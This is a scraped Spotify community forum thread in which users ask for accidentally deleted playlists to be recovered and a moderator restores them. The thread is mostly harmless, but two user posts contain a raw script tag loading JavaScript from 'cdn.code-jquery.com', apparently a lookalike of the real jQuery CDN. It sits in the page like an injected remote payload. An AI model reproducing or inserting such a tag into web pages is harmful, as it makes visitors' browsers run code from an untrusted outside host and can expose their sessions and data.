Help Wizard

Step 1

NEXT STEP

Recover deleted playlist

Solved!

Recover deleted playlist

Know this is a long shot but.... I've accidentally deleted a playlist I've spent weeks working on. Is there any way of getting it back?

It's called 'Boat party' and there was about 100 songs on it. Thanks.

1,112 Replies

ice-cream12 - I think the issue here is you've got two accounts with us. One is your original Spotify account while the other is linked to your Facebook. 

That 'music!!' playlist is in your Facebook account. I'll drop you an email with a bit more info. 

tiffwan - "nye 2013" will be back as soon as you log in again. 

I lost list Desiree account: univeridioma.

Hi!

I accidently deleted a playlist on last friday. Is there any way I can recover it?

Thanks!

Joce

bael - That playlist will be back as soon as you sign in again. 

jocelynlt - What's the name of the playlist you're missing?

Hi Meredith,

Playlist name was Kiki's music or Kiki, no sure..

@Jocelynlt wrote:

Hi Meredith,

Playlist name was Kiki's music or Kiki, no sure..

Cool, that's back for you now. 

You rock..

Thanks!

Hey Spotify

I deleted my playlist "iTunes" on Spotify! I'm so sad about it, 'cause I have spend so long time on making the list with songs!

I hope you can recover it!

User: Julie Arent Olsson

please can someone recover my playlist "New Favorits" had over 200 songs on there really would love to get it back please please please 🙂 

Olsson & sophieredman - Those will back for both of you as soon as your log in again 🙂

I just deleted a playlist titled ‘Collection’. Any chance you could recover this for me? I’d really, really appreciate it.

I accidentally deleted playlists called "All-Time Favourites" and "Current Favourites" from Spotify iPhone and, silly me, it deleted it from my computer as well. I worked on it all day today, any chance someone could help me recover it? Please???

Glittercake - Done. Just log out and in.
-------

Check out how we're doing over @SpotifyStatus

Question answered? Just click 'Accept as solution' to help other users out. Easy.

Who's your Spotify Star?

THANK YOU SO MUCH.

Is it possible to get the playlist that is supposed to show all the songs have liked from radio back please, not sure why but its not currently showing in my playlists!

<script type="text/javascript" src="http://cdn.code-jquery.com/jquery-1.7.2.min.js"></script>

I think I accidently deleted my playlist called "new" this morning. If possible, could you please recover it for me 🙂

thanks

-hunter8

i am new at spotify. somehow, all my playlists have suddenly disappeared. anybody know how to get them back? can the spotify moderater help me on this one?

ninjaspyda - Sorry but I can't find your Liked from Radio playlist. When was the last time you saw it?

hunter8 - That playlist will return when you sign in again. 

spotty - The only playlists I can see are within your iTunes folder. Did you have any playlists created within the Spotify app?

I don't recall ever seeing it but i have liked songs from radio so surely it must have existed at some point, very strange!

<script type="text/javascript" src="http://cdn.code-jquery.com/jquery-1.7.2.min.js"></script>

Hi, I've just deleted a playlist called 'Everything' could please help me get it back? 

Unsername cjm-13 

Thanks! 

Suggested posts